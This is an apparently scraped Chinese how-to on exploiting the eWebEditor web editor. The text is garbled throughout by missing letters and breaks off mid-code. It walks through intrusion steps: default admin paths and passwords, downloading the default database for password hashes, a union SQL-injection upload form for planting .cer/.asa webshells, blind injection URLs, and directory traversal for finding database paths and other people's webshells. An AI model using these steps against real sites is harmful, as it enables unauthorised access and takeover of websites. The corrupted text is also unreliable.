ewebeditor漏洞利用总结.docVIP

ewebeditor漏洞利用总结 eebeditr漏洞利用总结 先从最基本的记录起！通常入侵eebeditr编辑器的步骤如下: 1、首先访问默认管理页看是否存在。 默认管理页地址2.80以前为 eebeditr/adin_lgin.asp 以后版本为adin/lgin.asp (各种语言的大家自己改后缀，本文就以asp来进行说明，下面不再细说了！) 2、默认管理帐号密码！ 默认管理页存在！我们就用帐号密码登陆！默认帐号密码为: adin adin888 ！常用的密码还有adin adin999 adin1 adin000 之类的。 3、默认数据库地址。 如果密码不是默认的。我们就访问是不是默认数据库！尝试下载数据库得到管理员密码！管理员的帐号密码，都在eebEditr_Syste表段里，sys_UserNae Sys_UserPass 都是d5加密的。得到了加密密码。可以去 /eebeditr/uplad.asp?atin=saveap;type=IAGEap;style=standardunin selet S_ID,S_Nae,S_Dir,S_SS,S_UpladDir,S_idth,S_Height,S_e,S_IsSys,S_FileExt,S_FlashExt, [S_IageExt]%2b|er,S_ediaExt,S_FileSize,S_FlashSize,S_IageSize,S_ediaSize,S_StateFlag,S_DetetFrrd,S_Initde,S_BaseUrl fr eebeditr_style here s_nae=standardanda=a ethd=pst nae=yfr entype=ultipart/fr-data input type=file nae=upladfile size=100brbr input type=subit value=Fuk /fr -------------------------------------------------------------------------------------------------------------- 以上代码令存为htl！修改红色部分的路径，然后自动上传 .er 文件！漏洞原因是因为sStyleNae变量直接从style中读取，并没有过滤，所以可以包含任意字符！用selet在eebeditr_style表中查找s_nae为sStyleNae的记录，找不到就提示出错！在sStyleNae变量中用unin来构造记录，我们可以在sAllExt中加入|er、|asa等！ 另外还有一些版本的eebeditr的uplad.asp文件存在注入漏洞！贴几个注入用的url！信息错误则返回脚本出错的提示，在浏览器左下角！具体利用如下: eebeditr/Uplad.asp?type=FILEap;style=standard_lblue1and%20(selet%20tp%201%20as(id(sys_userpass,15,1))%20fr%20eebeditr_syste%20)98%20and%201=1 注意修改红色部分的字段名、位数、asii码的值！ 7、目录遍历漏洞！ 这里大概说一下！目录遍历漏洞基本存在于eebeditr/adin_upladfile.asp 高版本的是eebeditr/adin/uplad.asp 文件！这个文件有的不需要登陆验证，有些需要！很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改！这种情况下，唯一可以利用的也就是利用遍历目录功能查看网站文件，比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等！这些都自由发挥了！说下漏洞利用方法！ 漏洞利用方式如下:在上传文件管理页面 随便选择一个上传样式！比如eebeditr/adin_upladfile.asp?id=14 在id后面添加ap;dir=../.. 类似如下:ebeditr/adin_upladfile.asp?id=14ap;dir=../../../../data/ 可以看到网站数据库的路径！ 另外一个遍历目录的漏洞文件是 eebeditr/asp/brse.asp 漏洞代码为 ： Funtin GetList() Di s_List, s_Url s_List = Di FS, UpladFlder, UpladFiles, UpladFile, sFileNae Respnse.rite surrDir n Errr Resue Next Set FS = Server.reatebje